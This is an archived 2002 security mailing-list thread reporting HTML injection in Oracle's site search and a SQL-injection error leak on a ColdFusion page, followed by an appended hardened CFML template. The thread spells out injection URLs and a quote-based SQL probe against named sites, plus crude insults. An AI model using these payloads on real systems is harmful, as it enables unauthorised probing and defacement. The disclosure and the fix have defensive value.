Vulnerability Development mailing list archives

Re: Oracle Databases Allow HTML/SQL injection


From: Jim Kovalchuk <raxor () dexlink com>
Date: Tue, 16 Apr 2002 11:27:43 -0700 (PDT)


On Tue, 16 Apr 2002, david evlis reign wrote:


"oracle database madness"

"I only have a few things to say." - davidr

css in the oracle search engine -->

http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=css<br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200

i get fucked up error messages from this:

Error generating ctx scoreORA-20000: interMedia Text error: DRG-10800: query 
failed: DRG-50921: EQUIV operand not a word or another EQUIV expression

and now, the oracle db, while my hacking was targeted at sql injection i 
found this:

Error Diagnostic Information
ODBC Error Code = S1000 (General error)
[INTERSOLV][ODBC Oracle driver][Oracle]ORA-01756: quoted string not properly 
terminated

The error occurred while processing an element with a general identifier of 
(CFQUERY), occupying document position (245:5) to (245:130).

Date/Time: Tue Apr 16 17:37:17 2002
Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows 3.1)
Remote Address: 64.66.85.22
Template: /content/www/prodn/bigpond/direct/view.cfm
Query String: ID='54 <-- HAHAH

with the url:

http://dsleerf.net/direct/view.cfm?ID='54

now, why i am laughing:

http://dsleerf.net/bigpond/direct/view.cfm?ID='54";><br><br><br><br><br><br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>


This looks like an input validation bug in the Cold Fusion code, as I'm
quite sure Oracle doesn't use Cold Fusion for their web applications.

Macromedia's drag and drop IDE isn't security aware yet. 


the oracle database is shit.
anyone who uses oracle is shit.
long live apple.

-davidr
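
Added example, not part of the thread or either poster's code: one way a ColdFusion template like the view.cfm named in the error output could validate and bind its ID parameter, keep driver errors off the page, and encode what it prints. The thread does not show the template's source, so the datasource `exampleDSN`, the `items` table and its columns, and the log file name are hypothetical.

```cfml
<!--- Added example: hardened sketch of a view.cfm-style template.
      Datasource "exampleDSN", table "items" and its columns are hypothetical. --->

<!--- 1. Reject anything that is not a short run of digits before touching the database --->
<cfparam name="URL.ID" default="">
<cfif NOT REFind("^[0-9]{1,9}$", URL.ID)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfoutput>Invalid item identifier.</cfoutput>
    <cfabort>
</cfif>

<!--- 2. Bind the value as a typed parameter instead of splicing it into the SQL text --->
<cftry>
    <cfquery name="getItem" datasource="exampleDSN">
        SELECT title, body
        FROM items
        WHERE id = <cfqueryparam value="#URL.ID#" cfsqltype="CF_SQL_INTEGER">
    </cfquery>
    <cfcatch type="Database">
        <!--- 3. Log the driver error server-side and show a generic message,
              not the ODBC/ORA text, template path and query string --->
        <cflog file="exampleApp" type="error" text="view.cfm query failed: #cfcatch.message#">
        <cfoutput>The requested item could not be loaded.</cfoutput>
        <cfabort>
    </cfcatch>
</cftry>

<!--- 4. HTML-encode every value written into the page --->
<cfoutput query="getItem">
    <h1>#HTMLEditFormat(getItem.title)#</h1>
    <p>#HTMLEditFormat(getItem.body)#</p>
</cfoutput>
```

With the digit check in place, a request such as `ID='54` gets the 400 response and never reaches the `cfquery` tag, and the request value is not echoed back.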


